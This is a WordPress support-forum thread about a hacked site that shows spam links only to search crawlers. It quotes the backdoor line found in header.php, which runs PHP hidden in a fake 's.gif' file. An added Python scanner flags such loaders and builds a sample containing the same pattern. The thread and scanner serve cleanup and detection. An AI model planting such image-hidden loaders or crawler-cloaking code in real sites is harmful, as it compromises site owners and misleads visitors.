You might want to go and ask these guys for help – http://sucuri.net/
They do this for a fee, but I’m sure they can help.
Otherwise, their blog might have some info.
That’s an interesting one – especially as sucuri.net’s scan isn’t picking it up. It might be worth contacting them about it.
unmaskparasites.com, however, did find the links: Scan result
Thread Starter
omatan
(@omatan)
@adpawl – I’ve seen these posts – I am looking for leads to identify this particular problem. Clearly I can try rebuilding, but that would be my last resort.
@esmi – thanks for the reference to unmaskparasites.com – didn’t know of that resource.
My main concern is being able to replicate the links on my browser – if I could do that I am certain I could identify where the breach is.
My main concern is being able to replicate the links on my browser – if I could do that I am certain I could identify where the breach is.
Try putting this into the browser:
site:seattlerueda.com viagra
https://www.google.ca/search?q=site%3Aseattlerueda.com+viagra&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
I cannot reproduce this problem in my browser, but the Google cache helps.
Links are inserted before <div id="main">
Look first in your header.php
Try checking your files by modification time.
Thread Starter
omatan
(@omatan)
@zooini – this isn’t the pharma hack
adpawl – the problem is I wanted to recreate it in my browser off the code – so I can trace how it occurs by turning things off
Seeing it in the google cache is useful to see where it occurs but doesn’t help me pinpoint which plugin or template or core area is affected. I did however look in the header of my theme and found what is likely the problem:
<?php $wp__theme_icon=@create_function('',@file_get_contents('...../s.gif'));$wp__theme_icon(); ?>
The s.gif file was some masked PHP code. I can’t test if that totally solved it, but will wait till there is a new Google cache.
Thanks.
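The checks discussed in this thread (files by modification time, and a header.php line that runs the contents of an image file as PHP), as an added example that is not part of the original posts. The function names, reason strings and sample directory are constructed for illustration.

```python
import os
import re
import tempfile

# Magic bytes a real image with each extension must start with.
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",),
               ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}
# Dynamic code built from a file read or decoder, like the header.php line above.
LOADER_RE = re.compile(
    rb"\b(create_function|eval|assert)\s*\([^;]{0,200}?"
    rb"\b(file_get_contents|base64_decode|gzinflate)\s*\(", re.I)

def scan(root, since=None):
    """Return sorted (relative path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # the first 1 MiB is enough for these checks
            if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
                findings.append((rel, "image extension, no image header"))
            if ext == ".php" and LOADER_RE.search(data):
                findings.append((rel, "dynamic code loaded from file/decoder"))
            if ext == ".php" and since is not None and os.path.getmtime(path) >= since:
                findings.append((rel, "modified since cutoff"))
    return sorted(findings)

def build_sample(root):
    """Write a constructed theme: a clean file, a loader, a fake GIF and a real one."""
    theme = os.path.join(root, "wp-content", "themes", "example")
    os.makedirs(theme)
    files = {
        "index.php": b"<?php echo file_get_contents('readme.txt'); ?>",
        "header.php": b"<?php $x=@create_function('',@file_get_contents('s.gif'));$x(); ?>",
        "s.gif": b"/* constructed stand-in for masked PHP */ return;",
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    }
    for name, body in files.items():
        with open(os.path.join(theme, name), "wb") as fh:
            fh.write(body)
        os.utime(os.path.join(theme, name), (1_000_000, 1_000_000))  # old mtime
    os.utime(os.path.join(theme, "header.php"), (2_000_000, 2_000_000))  # later edit

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan(tmp, since=1_500_000))
```

Modification times can be reset by whoever changed the file, so an empty "modified since cutoff" result does not clear a file; the content checks do not depend on it.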
@omatan, can you add code of this file to a service like Pastebin (pastebin.com, wordpress.pastebin.ca) then add your link to the post? Or send this file to my mail adpawl.it [ AT ] gmail.com ?
@omatan
First go to your site in Firefox. Then see if you can view generated source. I have so many web developer add-ons for firefox, I’m not sure if it’s in the default Firefox install or not. But it will show more than just view source, especially if a site is hacked.
Second, go download freefilesync:
http://sourceforge.net/projects/freefilesync/
It will allow you to compare fresh themes/plugins/core against your current install. It will tell you which files have different content/attributes. Then use a tool like WinMerge or KDiff to see the differences within each file specifically.
Thread Starter
omatan
(@omatan)
This means that what is checked is the User-Agent and IP range: http://pastebin.com/gZerFJPF
Thread Starter
omatan
(@omatan)
Thanks. Sneaky devils. That confirms what I suspected, that IP addresses were checked, exactly to fool you if you used an agent switcher.
What tool do you use to decode the PHP source?
I use only my head.
…well, maybe still n++ and php – of course ;-p